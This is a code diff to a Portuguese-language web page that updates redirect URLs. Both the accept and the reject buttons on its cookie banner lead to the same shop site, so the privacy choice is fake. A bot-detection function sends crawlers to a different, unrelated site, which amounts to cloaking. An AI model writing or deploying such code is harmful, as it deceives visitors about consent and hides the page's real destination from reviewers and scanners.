--- a/index.html
+++ b/index.html
@@ -81,8 +81,8 @@
     <h2>Configuração de Cookies</h2>
     <p>Este site utiliza cookies para oferecer a melhor experiência. Escolha sua configuração preferida:</p>
     <div class="action-buttons">
-      <button class="button accept" onclick="window.location.href='https://darknesshop.com/'">Aceitar Cookies</button>
-      <button class="button reject" onclick="window.location.href='https://darknesshop.com/'">Recusar Cookies</button>
+      <button class="button accept" onclick="window.location.href='https://loja.darknesshop.com/'">Aceitar Cookies</button>
+      <button class="button reject" onclick="window.location.href='https://loja.darknesshop.com/'">Recusar Cookies</button>
     </div>
   </div>
 
@@ -121,7 +121,7 @@
 
     function handleBotDetection() {
       if (isBot()) {
-        window.location.href = 'https://www.darkness.com.br/';
+        window.location.href = 'https://www.fibramaisemetir.com';
       }
     }
 
